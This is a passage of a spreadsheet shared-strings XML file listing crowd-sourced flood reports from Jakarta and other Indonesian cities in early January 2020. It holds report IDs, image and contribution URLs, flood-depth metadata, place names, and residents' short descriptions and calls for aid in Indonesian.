    <t>https://akcdn.detik.net.id/community/pasma/2020/01/02/15779334351511107643.jpg</t>
  </si>
  <si>
    <t>{ "points": 0 }</t>
  </si>
  <si>
    <t>Banjir di Jatinegara Kendaraan Harus Berputar</t>
  </si>
  <si>
    <t>Kondisi banjir di kawasan Jatinegara dekat pasar banjir luapan ciliwung sehingga jalan harus berputar ini.</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347131</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/01/02/15779335001161184728.jpg</t>
  </si>
  <si>
    <t>Banjir Kali Ciliwung Sudah Turun, Warga Bersih-bersih Rumah</t>
  </si>
  <si>
    <t>Banjir ciliwung sudah nampak turun dan air tdak deras lagi, Para warga sudah berkemas membersihkan rumahnya yang tergenang air kali.</t>
  </si>
  <si>
    <t>11577e8d-bb4e-448f-afdc-401d19fd53c7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/11577e8d-bb4e-448f-afdc-401d19fd53c7.jpg</t>
  </si>
  <si>
    <t>Banjir setinggi betis hingga lutut orang dewasa di seluruh kawasan jl tanjung duren utara</t>
  </si>
  <si>
    <t>e54efdc0-ad8f-484b-84fb-02b098235149</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e54efdc0-ad8f-484b-84fb-02b098235149.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 191, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "2595", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Air sudah surut &lt;&gt; 10-20 cm</t>
  </si>
  <si>
    <t>Kebon Baru</t>
  </si>
  <si>
    <t>f660b8ad-e9c2-443e-aa96-4cc6a1c3d271</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f660b8ad-e9c2-443e-aa96-4cc6a1c3d271.jpg</t>
  </si>
  <si>
    <t>Banjir di Komplek Perumahan Carina Sayang RW 10, Kel. Rawabuaya, Kec. Cengkareng, Jakarta Barat. Tinggi banjir bervariasi, rata2 1 meter.</t>
  </si>
  <si>
    <t>36ad2018-95f1-4daf-bbe0-e7494a863c72</t>
  </si>
  <si>
    <t>https://images.petabencana.id/36ad2018-95f1-4daf-bbe0-e7494a863c72.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 63 }</t>
  </si>
  <si>
    <t>6a63a1a1-521c-443c-9ee2-38a47c7d79aa</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6a63a1a1-521c-443c-9ee2-38a47c7d79aa.jpg</t>
  </si>
  <si>
    <t>Banjir dini hari td mencapai 4 meter...namun skrng sdh surut,  tapi masih 3meter</t>
  </si>
  <si>
    <t>785320d5-228d-456d-bad5-cf15e23b3919</t>
  </si>
  <si>
    <t>https://images.petabencana.id/785320d5-228d-456d-bad5-cf15e23b3919.jpg</t>
  </si>
  <si>
    <t>Banjir sejak kemarin sampai saat ini blm surut</t>
  </si>
  <si>
    <t>93fe89cc-68bb-4bc5-b600-5979896791ed</t>
  </si>
  <si>
    <t>https://images.petabencana.id/93fe89cc-68bb-4bc5-b600-5979896791ed.jpg</t>
  </si>
  <si>
    <t>969a8291-3ab3-43ba-9295-240c201a61d0</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 106 }</t>
  </si>
  <si>
    <t>Perumahan Griya Permata, Jl KH Ahmad Dahlan, Cipondoh sudah sepinggang orang dewasa. Mohon bantuannya</t>
  </si>
  <si>
    <t>6548c164-7742-4b5e-bac8-1c19fa7f220a</t>
  </si>
  <si>
    <t>{ "points": 3, "flood_depth": 195, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "896", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di atas atap lt 1... Masih belom ada bantuan</t>
  </si>
  <si>
    <t>Kampung Melayu</t>
  </si>
  <si>
    <t>0284997a-20d3-42b8-828e-068778c8957d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0284997a-20d3-42b8-828e-068778c8957d.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 31 }</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2082", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Pertokoan pulomas</t>
  </si>
  <si>
    <t>a1bd8c79-b222-4143-9634-4fe8c7a4d54c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a1bd8c79-b222-4143-9634-4fe8c7a4d54c.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 153, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Di jalanan sudah 150 CM</t>
  </si>
  <si>
    <t>32cd13b5-7658-461a-b5af-2ef78097fc07</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 110, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "128", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347133</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/01/02/347133-1577934274554648895.mov-03.jpg</t>
  </si>
  <si>
    <t>Susana Terkini Banjir Kawasan di Jatinegara</t>
  </si>
  <si>
    <t>Suasana jalan di Jatinegara sementara di tutup karena banjir sdh mencapai jalan. Tampak kendaraan bermotor milik warga parkir di jalan.</t>
  </si>
  <si>
    <t>8dc0cba8-1f3c-4956-8a1d-7363afb4082e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8dc0cba8-1f3c-4956-8a1d-7363afb4082e.jpg</t>
  </si>
  <si>
    <t>Banjir di jalan setinggi dada pada tgl 1 Jan 2020 pagi, sore surut setinggi lutut.</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347135</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/01/02/347135-1577934939469499634.mp4-03.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "992", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Pintu Air Manggarai Masih Dibersihkan dari Banyaknya Sampah</t>
  </si>
  <si>
    <t>JAKARTA : Petugas kebersihan pintu air Manggarai, Jakarta Pusat terus berjibaku mengangkat sampah yang tersangkut setelah terbawa arus dari hulu sungai, Kamis (2/1) pukul 10:00wib. Ketinggian debit air terpantau masih diatas normal.</t>
  </si>
  <si>
    <t>Pasar Manggis</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347137</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/01/02/157793557876613717.jpg</t>
  </si>
  <si>
    <t>Tol Japek Arah Jakarta Macet Total di KM 58 Karawang</t>
  </si>
  <si>
    <t>Penampakan arus lalu lintas di  Tol Japek Arah Jakarta Macet Total di KM 58 Karawang.</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347138</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/01/02/347138-15779361072088815218.mp4-03.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": null, "instance_region_code": null }</t>
  </si>
  <si>
    <t>Kondisi Terkini Banjir di Kemang Raya, Warga Gunakan Perahu</t>
  </si>
  <si>
    <t>Kondisi terkini di Kemang raya banjir masih menutup jalan. Warga harus menggunakan perahu untuk pergi mencari tempat yg lebih tinggi. sumber :mini anjani</t>
  </si>
  <si>
    <t>Cepedak</t>
  </si>
  <si>
    <t>Bruno</t>
  </si>
  <si>
    <t>Purworejo</t>
  </si>
  <si>
    <t>Jawa Tengah</t>
  </si>
  <si>
    <t>d02c16b4-8028-435d-a0c8-614c9f24b2d8</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 135 }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "110", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir 135CM</t>
  </si>
  <si>
    <t>1a21dc8f-f5e1-46aa-91a1-9abac442a7ca</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1a21dc8f-f5e1-46aa-91a1-9abac442a7ca.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 150, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir sejak tanggal 31 Desember 2019 malam sampai hari ini, ketinggian mulai dari 30 cm sampai dengan 150 cm di hari Kamis 2 Januari 2020.</t>
  </si>
  <si>
    <t>9abe002c-260f-42bc-b5c0-b6535bde9281</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 70, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir kira2 setinggi lutut sampai paha org dewasa</t>
  </si>
  <si>
    <t>e82cd573-b3bc-4c34-9366-e66f1c661f37</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e82cd573-b3bc-4c34-9366-e66f1c661f37.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "978", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir genangan, saluran air tidak lancar</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347146</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/01/02/15779390751012494965.png</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "727", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Begini Penampakan Banjir di Kawasan Pasar Baru</t>
  </si>
  <si>
    <t>Situasi terkini kawasan Pasar Baru Jakarta Pusat, akses jalan tak bisa dilewati oleh kendaraan, pengguna jalan cari jalan alternatif lain.</t>
  </si>
  <si>
    <t>b962cba4-17ae-45d7-afa2-34b821064a79</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b962cba4-17ae-45d7-afa2-34b821064a79.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 1, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "257", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir sudah surut</t>
  </si>
  <si>
    <t>ad5f938a-6fc5-4160-9c29-81f67f816587</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 25, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Sudah surut,angke ke jemb 2 bisa jalan angke ke pesing masih ada genangan 30cm motor susah mobil bisa lewat pelan2 ,jelmbr barat 3 sisa 2cm</t>
  </si>
  <si>
    <t>46f73db4-da77-43fd-b5fe-6dbe8c695d26</t>
  </si>
  <si>
    <t>https://images.petabencana.id/46f73db4-da77-43fd-b5fe-6dbe8c695d26.jpg</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 142, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir setinggi leher orang dewasa</t>
  </si>
  <si>
    <t>ceff8a79-b356-4904-b77a-c93a040d76f6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ceff8a79-b356-4904-b77a-c93a040d76f6.jpg</t>
  </si>
  <si>
    <t>{ "points": -3, "flood_depth": 150, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1283", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir parah</t>
  </si>
  <si>
    <t>Ragunan</t>
  </si>
  <si>
    <t>2e871978-5120-45b0-95ef-ad5f3d315c81</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2e871978-5120-45b0-95ef-ad5f3d315c81.jpg</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 141, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Semua TELUK GONG, jakarta Utara terendam banjir parah hampir 2 meter. Sudah mati lampu lebih 60 jam. Minim bantuan!!!</t>
  </si>
  <si>
    <t>40b70404-76e2-4c8f-b5fe-da451144941a</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 150, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir parah di kompleks DHI Duta Harapan Indah. Hari-Hari Swalayan. 2 Sungai besar meluap. Sudah 3 hari. Komunikasi dan listrik terputus</t>
  </si>
  <si>
    <t>76aa61ce-be6d-48bf-a60c-93b60ff3d411</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 119, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2482", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Tolong! Ini Kapuk dan Teluk Gong banjir parah! Ini daerah nyelamatin daerah Jakarta Utara lain dari banjir!! Sinyal dan Listik lumpuh total</t>
  </si>
  <si>
    <t>77ca15e0-65d7-48e6-b323-cd92d7acf3f4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/77ca15e0-65d7-48e6-b323-cd92d7acf3f4.jpg</t>
  </si>
  <si>
    <t>f92f95f8-d6a4-439f-9d00-7bada38f9acc</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 22, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir masih diatas mata kaki &amp; listrik padam. Banyak sampah berserakan.</t>
  </si>
  <si>
    <t>26f77255-fc99-4ce2-8f47-e0190510cd42</t>
  </si>
  <si>
    <t>{ "points": 4, "flood_depth": 99, "report_type": "flood" }</t>
  </si>
  <si>
    <t>SOS! Sudah hampir 4 hari, ga ada sinyal dan listrik di Teluk Gong dan Kapuk. Mohon di sorot media kalau ada daerah jkt utara yg kena banjir</t>
  </si>
  <si>
    <t>47945029-16bd-408a-b696-7a19989174ef</t>
  </si>
  <si>
    <t>https://images.petabencana.id/47945029-16bd-408a-b696-7a19989174ef.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 23 }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2618", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjir per hari ini, keadaan membaik, masih sebetis dewasa</t>
  </si>
  <si>
    <t>9b10b00f-6a87-41b0-a1a2-d1c2777129ba</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9b10b00f-6a87-41b0-a1a2-d1c2777129ba.jpg</t>
  </si>
  <si>
    <t>7d5467e1-c03b-466a-bc8a-5738ba45b02f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7d5467e1-c03b-466a-bc8a-5738ba45b02f.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 30, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Dijalan raya muchtar di perumahan Villa Casablanca, di aliran sungai pesanggrahan samping villa casablanca ada longsor dari sekolah lazuardi</t>
  </si>
  <si>
    <t>Sawangan Baru</t>
  </si>
  <si>
    <t>Sawangan</t>
  </si>
  <si>
    <t>7dda1561-7078-410c-a943-1d9474a00511</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7dda1561-7078-410c-a943-1d9474a00511.jpg</t>
  </si>
  <si>
    <t>Air masih mengenang dan beberapa warga sebagian masih belum mendapatkan bantuan</t>
  </si>
  <si>
    <t>Kalibaru</t>
  </si>
  <si>
    <t>Pakuhaji</t>
  </si>
  <si>
    <t>ba919f65-52f9-424f-b4d1-43fc91adf40e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ba919f65-52f9-424f-b4d1-43fc91adf40e.jpg</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 66, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Kebanyakan sampahnya... bau amis... kemudian surutnya lama..</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347239</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/01/03/15780357291921170923.jpg</t>
  </si>
  <si>
    <t>Pasca Hujan Deras, Tanggul Sungai di Desa Betek Ambrol</t>
  </si>
  <si>
    <t>Tanggul sungai Desa Betek Kecamatan Madiun Kabupaten Madiun, Jumat (03/01/2020) ambrol, setelah debit air sungai meningkat pasca hujan deras pada Kamis (02/01) kemarin.</t>
  </si>
  <si>
    <t>Tawangrejo</t>
  </si>
  <si>
    <t>Kartoharjo</t>
  </si>
  <si>
    <t>Madiun</t>
  </si>
  <si>
    <t>Jawa Timur</t>
  </si>
  <si>
    <t>9ff82b96-f7e2-450b-a838-465af78abca1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9ff82b96-f7e2-450b-a838-465af78abca1.jpg</t>
  </si>
  <si>
    <t>Komplek Villa Bintaro Regency Blok J &amp; Blok K, Kel Pondok Kacang Timur, Kec Pondok Aren, Tangerang Selatan, Prop Banten. Kedalaman 1,5m</t>
  </si>
  <si>
    <t>c314f737-bb95-4649-aeae-4fdb94c89d83</t>
  </si>
  <si>
    <t>{ "points": 3, "flood_depth": 104, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Tolong, banjir parah di sini, kompleks DHI, Bantuan Pompa belum ada, air tidak kunjung surut</t>
  </si>
  <si>
    <t>980420b1-ba46-4e12-8ec5-373a6d3582e8</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2504", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir diatas 120 cm!! Tidak surut2, Darurat sudah hampir 4 hari tidak ada listrik, air, makanan,  logistik. Pemerintah, jgn lupakan kami!</t>
  </si>
  <si>
    <t>472dda9c-cee1-4502-9b2c-4e6aa4028990</t>
  </si>
  <si>
    <t>https://images.petabencana.id/472dda9c-cee1-4502-9b2c-4e6aa4028990.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "979", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir terbesar di kober dan di awal tahun</t>
  </si>
  <si>
    <t>Cipete Utara</t>
  </si>
  <si>
    <t>Kebayoran Baru</t>
  </si>
  <si>
    <t>b50d4609-a9ab-4d41-b5b3-ced508eefab0</t>
  </si>
  <si>
    <t>Banjirnya udh mulai surut sih disini. Tp tolong listriknya. Udh 3 hr nih hic</t>
  </si>
  <si>
    <t>a04be622-fa01-42b5-b284-acc62fb31eda</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 101 }</t>
  </si>
  <si>
    <t>Banjir sudah sejak tgl 1. Beberapa titik di perumahan Green Ville mencapai 2m. Sekarang sudah surut cukup banyak, sisa 1-1.5m.</t>
  </si>
  <si>
    <t>8b55f156-1002-41d0-8150-e26a50e1b795</t>
  </si>
  <si>
    <t>Per hari ini 20.00 sudah kering di jl arjuna, tp disekitar perumahan rawa buaya masib banjir dan pln mati dr tgl 1 sampai skrng</t>
  </si>
  <si>
    <t>b25ee715-00ba-475e-9887-64d4efb3fb59</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b25ee715-00ba-475e-9887-64d4efb3fb59.jpg</t>
  </si>
  <si>
    <t>Banjir masih melanda kawasan Pesing garden. Namun mulai surut.</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347257</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/01/03/1578063581753249474.jpg</t>
  </si>
  <si>
    <t>Jalan Kincan Masih Tergenang Setinggi 15 Cm</t>
  </si>
  <si>
    <t>Hingga saat ini Jalan Kincan, Pondokgede kasih tergenang air setinggi 15 cm.</t>
  </si>
  <si>
    <t>5191e8c1-273e-456f-989e-4dea83b91c94</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5191e8c1-273e-456f-989e-4dea83b91c94.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 49, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Perumahan Griya Setu Permai 3</t>
  </si>
  <si>
    <t>Cileduk</t>
  </si>
  <si>
    <t>Setu</t>
  </si>
  <si>
    <t>ad262df3-25cf-448a-9624-bb232d6267bd</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ad262df3-25cf-448a-9624-bb232d6267bd.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2582", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Kedaung Kali Angke</t>
  </si>
  <si>
    <t>cc56e0c4-22e9-4155-9fc8-6b65b8fa9611</t>
  </si>
  <si>
    <t>https://images.petabencana.id/cc56e0c4-22e9-4155-9fc8-6b65b8fa9611.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 1 }</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1297", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Tolong sampah banjir di angkutin..belum ada team kebersihan yang angkut. Jl. Pembangunan bawah RT 006 RW 012 Kel Bintaro Kec pesanggrahaan</t>
  </si>
  <si>
    <t>d86fb183-2742-4d22-8d46-6b5f66ed1849</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d86fb183-2742-4d22-8d46-6b5f66ed1849.jpg</t>
  </si>
  <si>
    <t>Tanggal 4 jan 2020,komplek Greenville tahap 4, Duri Kepa.</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347279</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/01/04/347279-1578107239343705565.mp4-03.jpg</t>
  </si>
  <si>
    <t>Pasca Banjir, Kali di Dekat Graha Prima Jadi 'Tempat Sampah'</t>
  </si>
  <si>
    <t>Pasca banjir beberapa hari lalu, kali yang berada di Graha Prima, Tambun Utara menyisakan tumpukan sampah. Sampai hari ini belum ada pihak terkait atau warga yang membersihkannya, karena warga sendiri masih sibuk membersihkan rumah mereka yang terkena ba</t>
  </si>
  <si>
    <t>Satriajaya</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347281</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/01/04/347281-15781076862074279237.mp4-03.jpg</t>
  </si>
  <si>
    <t>Pasca Banjir, Warga Tambun Manfaatkan Untuk Mencari Ikan</t>
  </si>
  <si>
    <t>Mancing ikan setelah banjir surut, warga Tambun Utara, Kabupaten Bekasi ini mencari peruntungan. Seperti banjir sebelumnya menurut warga "saat seperti ini lah lebih banyak ikan yang muncul keatas permukaan air bahkan kita mencarinya tak perlu memancing k</t>
  </si>
  <si>
    <t>05c883d5-d08f-4c75-bdfa-4c86e212fd0f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/05c883d5-d08f-4c75-bdfa-4c86e212fd0f.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 24, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1302", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Sudah aga surut</t>
  </si>
  <si>
    <t>Petukangan Utara</t>
  </si>
  <si>
    <t>cdfa2bc3-3303-46cb-b311-08ade4ec5e52</t>
  </si>
  <si>
    <t>{ "points": -3, "flood_depth": 1, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "865", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Alhamdulillah gak ada banjir di rumah. Tapi kemarin 01012020 di jalan manggis ada longsor kecil gitu tapi aku gak tau di sebelah mananya</t>
  </si>
  <si>
    <t>daef7775-e8c3-43df-b7a1-e24e3f11ed02</t>
  </si>
  <si>
    <t>https://images.petabencana.id/daef7775-e8c3-43df-b7a1-e24e3f11ed02.jpg</t>
  </si>
  <si>
    <t>Ini pos pengungsian RT1/RW1 di Jl Dharma Karya. Sebagian rumah msh tergenang &amp; sebagian msh banjir sepinggang. Di pengungsian butuh tenda</t>
  </si>
  <si>
    <t>547e0f73-18d0-478a-b82f-0e17f8925e83</t>
  </si>
  <si>
    <t>https://images.petabencana.id/547e0f73-18d0-478a-b82f-0e17f8925e83.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "2403", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Pondok Labu</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347370</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/01/06/1578280881541661478.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "2643", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Masuk Sekolah, SMA Negeri 8 Masih Bersih-bersih Banjir</t>
  </si>
  <si>
    <t>Kegiatan belajar mengajar tetap berlangsung di SMA 8 Manggarai, Jakarta Selatan, Proses bersih-bersih sisa banjir juga masih terus dikerjakan oleh petugas kebersihan sekolah dibantu PPSU pkl 10:23</t>
  </si>
  <si>
    <t>Bukit Duri</t>
  </si>
  <si>
    <t>04dd2642-77e7-4504-bdb3-6cf11737d4c6</t>
  </si>
  <si>
    <t>Ggh</t>
  </si>
  <si>
    <t>38a55433-aa1a-4428-b481-f8d523c94f9e</t>
  </si>
  <si>
    <t>banjir bro dilaut</t>
  </si>
  <si>
    <t>Klandasan Ilir</t>
  </si>
  <si>
    <t>Balikpapan Selatan</t>
  </si>
  <si>
    <t>Balikpapan</t>
  </si>
  <si>
    <t>Kalimantan Timur</t>
  </si>
  <si>
    <t>0a60e678-c6bb-4751-95db-8ae10542cd78</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 27, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1002", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Maaf tidak ada poto karena sedang jalan pulang kerja, banjir di depan rs Muhammadiyah taman puring jaksel, hujan kecil / besar pasti menggen</t>
  </si>
  <si>
    <t>Kramat Pela</t>
  </si>
  <si>
    <t>a7f4ae52-adf4-40cd-9c9e-0437712d5e57</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a7f4ae52-adf4-40cd-9c9e-0437712d5e57.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 161 }</t>
  </si>
  <si>
    <t>Tgl 1 jam 5 subuh air tiba2 menyerbu deras ke daerah kami dari arah RPTRA Kembangan Utara.  Jam 4 sore air sepinggang dan jam 6 sore air dad</t>
  </si>
  <si>
    <t>b9383d86-0668-4c36-964b-7167805d448e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b9383d86-0668-4c36-964b-7167805d448e.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "1243", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir dari jam 5 subuh sampai jam 11 siang</t>
  </si>
  <si>
    <t>6f51cc59-fb68-41a4-86aa-daa812260368</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6f51cc59-fb68-41a4-86aa-daa812260368.jpg</t>
  </si>
  <si>
    <t>Tinggi air di jalan mencapai 80cm. Untuk rumah yg lebih rendah air masuk ke dalam rumah sekitar 20-30cm. Banjir terburuk.</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347400</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/01/07/347400-1578354513522279360.mov-03.jpg</t>
  </si>
  <si>
    <t>Pasca Banjir, Begini Kondisi Ciliwung di Kawasan Tebet</t>
  </si>
  <si>
    <t>Penampakan Ciliwung di sekitar Tebet pagi ini tampak surut dan arus tidak kencang terlihat sisa-sisa dampak banjir luapannya masih terlihat.</t>
  </si>
  <si>
    <t>d94cb0fd-fded-4c99-a7e5-c9b7b2b714b4</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "6440", "instance_region_code": "srg" }</t>
  </si>
  <si>
    <t>Akankah Semarang ada banjir?</t>
  </si>
  <si>
    <t>Bulusan</t>
  </si>
  <si>
    <t>Tembalang</t>
  </si>
  <si>
    <t>Semarang</t>
  </si>
  <si>
    <t>6b5e7cad-7e72-48bc-8043-9afd584a58af</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6b5e7cad-7e72-48bc-8043-9afd584a58af.jpg</t>
  </si>
  <si>
    <t>Banjir di jl. H briti. B rt. 04/09 sedalam mulai dari 30cm -1 meter</t>
  </si>
  <si>
    <t>8a80c4f2-31e1-4f9a-b7ca-6762403e9b56</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8a80c4f2-31e1-4f9a-b7ca-6762403e9b56.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 14 }</t>
  </si>
  <si>
    <t>0e45cab6-0f6a-4e63-b365-f928a4729fd1</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": null, "instance_region_code": "sby" }</t>
  </si>
  <si>
    <t>Banjir got</t>
  </si>
  <si>
    <t>Embong Kaliasin</t>
  </si>
  <si>
    <t>Genteng</t>
  </si>
  <si>
    <t>Surabaya</t>
  </si>
  <si>
    <t>73b1700f-2de0-45c2-a129-38d2c5320d8d</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 51, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2679", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Rumah dan daerah kami  tidak pernah kena banjir  sejak 2000 tinggal disini. Banjir seperti Tsunami, seperti bendungan jebol</t>
  </si>
  <si>
    <t>Cipinang Melayu</t>
  </si>
  <si>
    <t>702deffb-2095-4200-aae6-6d89a04a8cb0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/702deffb-2095-4200-aae6-6d89a04a8cb0.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 165 }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2383", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Setelah banjir air surut sekarang jadi banjir sampah dimana mana</t>
